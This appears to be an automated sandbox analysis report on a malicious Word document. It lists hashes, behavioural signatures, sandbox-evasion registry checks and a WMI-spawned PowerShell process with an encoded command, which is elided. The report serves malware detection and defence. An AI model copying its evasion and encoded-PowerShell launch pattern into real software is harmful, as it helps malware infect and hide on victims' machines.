Analysis
- max time kernel: 150s
- max time network: 151s
- platform: windows10_x64
- resource: win10v200722
- submitted: 01-08-2020 19:38

Tasks:
- Static task: static1
- Behavioral task: behavioral1
  - Sample: SecuriteInfo.com.Exploit.Siggen2.9920.3882.15200.doc
  - Resource: win7v200722
- Behavioral task: behavioral2
  - Sample: SecuriteInfo.com.Exploit.Siggen2.9920.3882.15200.doc
  - Resource: win10v200722
General
- Target: SecuriteInfo.com.Exploit.Siggen2.9920.3882.15200.doc
- Size: 175KB
- MD5: 0044ba776778e2f3ec800a96294ce8b3
- SHA1: 0a3c6df795a29e3eef7ddf0aa2bfa03daf401e6e
- SHA256: 7ef18f7b96100c4dc8a648050ff5c5995b2ba175593ecbdde9a2c66ddb0a5efe
- SHA512: d7ff746f87d9d43b5e104bebe979585de4a96d292bf3dfb057e8cc1a06298373bd762f7c18759c9f2cfd93abddc573d03c5baf3c0c62632b73dc7c418a0e4ded
Malware Config
Extracted
Signatures
- Suspicious use of SetWindowsHookEx (10 IoCs)
  Processes: WINWORD.EXE, pid 500 (10 occurrences)
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes: WINWORD.EXE, pid 500 (2 occurrences)
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: powersheLL.exe, pid 3668, pid_target 1028
  - Description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powersheLL.exe, pid 3668
  - Token: SeDebugPrivilege
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powersheLL.exe, pid 3668 (3 occurrences)
- Blacklisted process makes network request (5 IoCs)
  Processes: powersheLL.exe, pid 3668
  - Flows: 26, 28, 30, 32, 34
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: WINWORD.EXE
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: WINWORD.EXE
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
  - Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen2.9920.3882.15200.doc" /o ""
  - Suspicious use of SetWindowsHookEx
  - Suspicious behavior: AddClipboardFormatListener
  - Checks processor information in registry
  - Enumerates system info in registry
- C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
  Command line: powersheLL -e [encoded argument elided]
  - Process spawned unexpected child process
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious behavior: EnumeratesProcesses
  - Blacklisted process makes network request